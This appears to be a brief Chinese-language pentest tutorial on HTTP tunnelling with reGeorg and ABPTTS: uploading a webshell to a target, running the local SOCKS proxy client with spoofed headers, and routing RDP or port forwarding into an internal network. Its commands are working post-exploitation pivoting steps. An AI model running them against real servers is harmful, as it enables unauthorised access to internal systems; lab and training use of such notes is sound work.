HTTP隧道

一、reGeorg

下载地址：https://github.com/gorgiaxx/reGeorg

1. 上传webshell并访问

http://1.1.1.1:8888/tunnel.jsp

image.png

2. 本地运行reGeorgSocksProxy.py

python reGeorgSocksProxy.py -p 4444 -u http://1.1.1.1:8888/tunnel.jsp
python reGeorgSocksProxy.py -p 8080 -r 4096 -w 4096 -u http://1.1.1.1:8000/hackable/uploads/tunnel.php --custom-headers "{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Referer': 'www.baidu.com'}"

image.png

3. 配置Proxifier
   添加服务器server：

image.png

添加规则rule，设置成默认拒绝：

image.png

4. 配置完成后，mstsc.exe打开方式选择Proxifier，然后输入内网ip即可连接目标服务器

image.png

二、ABPTTS

下载地址：https://github.com/nccgroup/ABPTTS.git

1. 下载并配置ABPTTS

python2 -m pip install pycrypto
python2 -m pip install httplib2
git clone https://github.com/nccgroup/ABPTTS.git
python abpttsfactory.py -o webshell

2. 上传webshell并访问

image.png

3. 访问本机的1080端口，相当于访问目标的80端口

python abpttsclient.py -c webshell/config.txt -u "http://1.1.1.1:8080/abptts/abptts.jsp" -f 192.168.80.218:1080/192.168.111.4:80

image.png